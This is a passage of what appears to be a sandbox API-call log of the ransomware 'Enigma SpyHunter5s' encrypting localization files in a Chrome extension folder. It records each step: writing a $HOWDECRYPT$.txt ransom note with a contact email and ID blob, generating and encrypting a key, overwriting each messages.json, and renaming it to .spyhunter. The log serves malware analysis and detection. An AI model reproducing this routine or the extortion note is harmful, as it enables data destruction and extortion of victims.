hTemplateFile=0x0) returned 0x178 [0160.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json") returned 155 [0160.139] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.139] GetProcessHeap () returned 0x2c0000 [0160.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.139] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb1c*=0xc2, lpOverlapped=0x0) returned 1 [0160.140] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.140] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x25ceb1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb1c*=0xc2, lpOverlapped=0x0) returned 1 [0160.140] GetProcessHeap () returned 0x2c0000 [0160.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.140] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.140] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb1c, lpOverlapped=0x0 | out: lpBuffer=0x25ceb5c*, lpNumberOfBytesWritten=0x25ceb1c*=0x4, lpOverlapped=0x0) returned 1 [0160.140] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb1c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb1c*=0x30, lpOverlapped=0x0) returned 1 [0160.141] CloseHandle (hObject=0x178) returned 1 [0160.141] GetProcessHeap () returned 0x2c0000 [0160.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.141] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.spyhunter") returned 165 [0160.141] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.spyhunter")) returned 1 [0160.142] GetProcessHeap () returned 0x2c0000 [0160.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.142] GetProcessHeap () returned 0x2c0000 [0160.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.142] GetProcessHeap () returned 0x2c0000 [0160.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f298 | out: hHeap=0x2c0000) returned 1 [0160.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.143] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.143] WriteFile (in: hFile=0x178, lpBuffer=0x25cea93*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x25cea93*, lpNumberOfBytesWritten=0x25cebbc*=0x127, lpOverlapped=0x0) returned 1 [0160.144] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.144] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebbc*=0x2ac, lpOverlapped=0x0) returned 1 [0160.145] CloseHandle (hObject=0x178) returned 1 [0160.145] GetProcessHeap () returned 0x2c0000 [0160.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1a328 | out: hHeap=0x2c0000) returned 1 [0160.145] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb58 | out: pbBuffer=0x25ceb58) returned 1 [0160.145] GetProcessHeap () returned 0x2c0000 [0160.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.145] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb50*=0x30) returned 1 [0160.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.146] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json") returned 158 [0160.146] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.146] GetProcessHeap () returned 0x2c0000 [0160.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.146] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb14*=0xaa, lpOverlapped=0x0) returned 1 [0160.147] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.147] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xaa, lpNumberOfBytesWritten=0x25ceb14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb14*=0xaa, lpOverlapped=0x0) returned 1 [0160.147] GetProcessHeap () returned 0x2c0000 [0160.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.147] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.147] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb14, lpOverlapped=0x0 | out: lpBuffer=0x25ceb54*, lpNumberOfBytesWritten=0x25ceb14*=0x4, lpOverlapped=0x0) returned 1 [0160.147] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb14, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb14*=0x30, lpOverlapped=0x0) returned 1 [0160.148] CloseHandle (hObject=0x178) returned 1 [0160.148] GetProcessHeap () returned 0x2c0000 [0160.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.148] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.spyhunter") returned 168 [0160.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.spyhunter")) returned 1 [0160.149] GetProcessHeap () returned 0x2c0000 [0160.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.149] GetProcessHeap () returned 0x2c0000 [0160.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.149] GetProcessHeap () returned 0x2c0000 [0160.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f110 | out: hHeap=0x2c0000) returned 1 [0160.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.150] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.150] WriteFile (in: hFile=0x178, lpBuffer=0x25cea8b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x25cea8b*, lpNumberOfBytesWritten=0x25cebb4*=0x127, lpOverlapped=0x0) returned 1 [0160.151] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.151] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebb4*=0x2ac, lpOverlapped=0x0) returned 1 [0160.151] CloseHandle (hObject=0x178) returned 1 [0160.152] GetProcessHeap () returned 0x2c0000 [0160.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1a190 | out: hHeap=0x2c0000) returned 1 [0160.152] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb50 | out: pbBuffer=0x25ceb50) returned 1 [0160.152] GetProcessHeap () returned 0x2c0000 [0160.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.152] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb48*=0x30) returned 1 [0160.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.153] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json") returned 158 [0160.153] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.153] GetProcessHeap () returned 0x2c0000 [0160.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.153] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb0c*=0xd2, lpOverlapped=0x0) returned 1 [0160.154] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.154] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x25ceb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb0c*=0xd2, lpOverlapped=0x0) returned 1 [0160.154] GetProcessHeap () returned 0x2c0000 [0160.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.154] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.154] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb0c, lpOverlapped=0x0 | out: lpBuffer=0x25ceb4c*, lpNumberOfBytesWritten=0x25ceb0c*=0x4, lpOverlapped=0x0) returned 1 [0160.154] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb0c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb0c*=0x30, lpOverlapped=0x0) returned 1 [0160.154] CloseHandle (hObject=0x178) returned 1 [0160.154] GetProcessHeap () returned 0x2c0000 [0160.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.155] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.spyhunter") returned 168 [0160.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.spyhunter")) returned 1 [0160.156] GetProcessHeap () returned 0x2c0000 [0160.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.156] GetProcessHeap () returned 0x2c0000 [0160.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.156] GetProcessHeap () returned 0x2c0000 [0160.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7ef88 | out: hHeap=0x2c0000) returned 1 [0160.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.157] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.157] WriteFile (in: hFile=0x178, lpBuffer=0x25cea83*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x25cea83*, lpNumberOfBytesWritten=0x25cebac*=0x127, lpOverlapped=0x0) returned 1 [0160.158] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.158] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebac*=0x2ac, lpOverlapped=0x0) returned 1 [0160.158] CloseHandle (hObject=0x178) returned 1 [0160.158] GetProcessHeap () returned 0x2c0000 [0160.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f19ff8 | out: hHeap=0x2c0000) returned 1 [0160.158] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb48 | out: pbBuffer=0x25ceb48) returned 1 [0160.158] GetProcessHeap () returned 0x2c0000 [0160.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.158] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb40*=0x30) returned 1 [0160.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_CN\\messages.json") returned 158 [0160.159] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0160.159] GetProcessHeap () returned 0x2c0000 [0160.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0160.159] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb04*=0xb0, lpOverlapped=0x0) returned 1 [0160.160] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.160] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x25ceb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb04*=0xb0, lpOverlapped=0x0) returned 1 [0160.160] GetProcessHeap () returned 0x2c0000 [0160.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.160] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.161] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb04, lpOverlapped=0x0 | out: lpBuffer=0x25ceb44*, lpNumberOfBytesWritten=0x25ceb04*=0x4, lpOverlapped=0x0) returned 1 [0160.161] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb04, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb04*=0x30, lpOverlapped=0x0) returned 1 [0160.161] CloseHandle (hObject=0x178) returned 1 [0160.161] GetProcessHeap () returned 0x2c0000 [0160.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.161] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 